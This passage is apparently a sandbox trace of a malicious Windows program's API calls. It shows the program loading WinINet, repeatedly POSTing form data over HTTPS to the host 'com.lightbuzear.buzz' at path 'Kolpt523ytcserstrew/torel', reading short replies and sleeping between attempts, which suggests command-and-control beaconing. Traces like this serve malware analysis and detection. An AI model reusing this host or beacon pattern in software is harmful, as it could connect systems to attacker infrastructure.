(HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bee88 [0280.383] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0280.383] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed20 [0280.384] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0280.384] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0280.384] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0280.384] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0280.385] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed20 | out: hHeap=0x4780000) returned 1 [0280.385] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0280.391] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0280.391] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0280.391] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0280.391] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0280.391] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0280.391] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0280.391] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0280.391] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0280.391] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0280.391] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f218 [0280.391] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0280.391] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f128 [0280.392] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f218 | out: hHeap=0x4780000) returned 1 [0280.392] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0280.392] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f128 | out: hHeap=0x4780000) returned 1 [0280.392] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf068 [0280.392] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0280.392] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0280.392] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf068 | out: hHeap=0x4780000) returned 1 [0280.392] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47befc8 [0280.392] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0280.392] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf108 [0280.392] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0280.393] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0280.393] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0280.393] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0280.393] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf108 | out: hHeap=0x4780000) returned 1 [0280.393] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0280.394] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0280.394] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0280.394] FreeLibrary (hLibModule=0x71570000) returned 1 [0280.394] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0280.394] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0280.394] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beed8 | out: hHeap=0x4780000) returned 1 [0280.394] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beb68 | out: hHeap=0x4780000) returned 1 [0280.394] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be848 | out: hHeap=0x4780000) returned 1 [0280.395] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0280.395] Sleep (dwMilliseconds=0x2710) [0280.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0280.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0280.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0280.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0280.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0280.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0280.406] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0280.406] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0280.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0280.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f170 [0280.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0280.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f110 [0280.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f170 | out: hHeap=0x4780000) returned 1 [0280.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0280.407] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f110 | out: hHeap=0x4780000) returned 1 [0280.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f0b0 [0280.407] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be848 [0280.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be848 | out: hHeap=0x4780000) returned 1 [0280.408] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0280.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beb68 [0280.408] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0280.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce610 [0280.408] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0280.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0280.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0280.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce740 [0280.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f0c8 [0280.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f140 [0280.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f0c8 | out: hHeap=0x4780000) returned 1 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0280.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f140 | out: hHeap=0x4780000) returned 1 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47be848 [0280.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbd68 [0280.409] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be848 | out: hHeap=0x4780000) returned 1 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be848 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb978 [0280.409] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8e8 [0280.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb978 | out: hHeap=0x4780000) returned 1 [0280.410] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0280.411] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0280.411] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0280.411] FreeLibrary (hLibModule=0x71780000) returned 1 [0280.411] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47be8e8 | out: hHeap=0x4780000) returned 1 [0280.411] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0280.411] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47be8e8 [0280.411] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0280.411] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0280.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5b0 [0280.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0280.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0280.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0280.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0280.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0280.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0280.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0280.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f080 [0280.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0280.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f098 [0280.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f080 | out: hHeap=0x4780000) returned 1 [0280.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0280.412] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f098 | out: hHeap=0x4780000) returned 1 [0280.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f128 [0280.412] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed98 [0280.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed98 | out: hHeap=0x4780000) returned 1 [0280.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0280.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beff0 [0280.413] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0280.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf1d0 [0280.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce600 [0280.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0280.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0280.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5f0 [0280.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0280.413] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0280.413] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0280.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5e0 [0280.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0280.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f098 [0280.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0280.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1b8 [0280.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f098 | out: hHeap=0x4780000) returned 1 [0280.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0280.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1b8 | out: hHeap=0x4780000) returned 1 [0280.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x480f140 [0280.414] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed48 [0280.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed48 | out: hHeap=0x4780000) returned 1 [0280.414] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0280.414] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0280.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0280.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce6e0 [0280.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0280.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0280.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0280.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0280.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0280.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0280.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0280.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f188 [0280.415] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0280.415] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f110 [0280.416] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f188 | out: hHeap=0x4780000) returned 1 [0280.416] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0280.416] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f110 | out: hHeap=0x4780000) returned 1 [0280.416] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bf1a8 [0280.416] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0280.416] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0280.416] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bf1a8 | out: hHeap=0x4780000) returned 1 [0280.416] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beeb0 [0280.416] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0280.416] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bef28 [0280.416] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0280.417] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0280.425] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0280.425] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0280.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bef28 | out: hHeap=0x4780000) returned 1 [0280.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0280.425] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce600 [0280.425] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6c0 [0280.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0280.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6f0 [0280.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f1e8 [0280.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f110 [0280.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1e8 | out: hHeap=0x4780000) returned 1 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0280.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f110 | out: hHeap=0x4780000) returned 1 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47becf8 [0280.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba20 [0280.426] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47becf8 | out: hHeap=0x4780000) returned 1 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47becf8 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb940 [0280.426] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bed70 [0280.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0280.427] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba20 | out: hHeap=0x4780000) returned 1 [0280.427] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0280.427] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0281.431] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bed70 | out: hHeap=0x4780000) returned 1 [0281.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce730 [0281.431] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0281.431] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0281.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6a0 [0281.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0281.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0281.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6b0 [0281.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0281.432] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0281.432] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0281.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0281.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0281.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f110 [0281.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0281.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f188 [0281.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f110 | out: hHeap=0x4780000) returned 1 [0281.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0281.439] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f188 | out: hHeap=0x4780000) returned 1 [0281.439] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bee10 [0281.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0281.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0281.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47bee10 | out: hHeap=0x4780000) returned 1 [0281.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47bf090 [0281.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbf28 [0281.440] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x47beed8 [0281.440] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0281.441] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0281.441] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0281.441] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0281.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47beed8 | out: hHeap=0x4780000) returned 1 [0281.442] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0281.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce750 [0281.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0281.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0281.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0281.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0281.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5f0 [0281.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0281.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0281.442] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0281.442] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x480f110 [0281.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0281.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x480f1e8 [0281.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f110 | out: hHeap=0x4780000) returned 1 [0281.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0281.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480f1e8 | out: hHeap=0x4780000) returned 1 [0281.443] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x47bed70 [0281.443] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 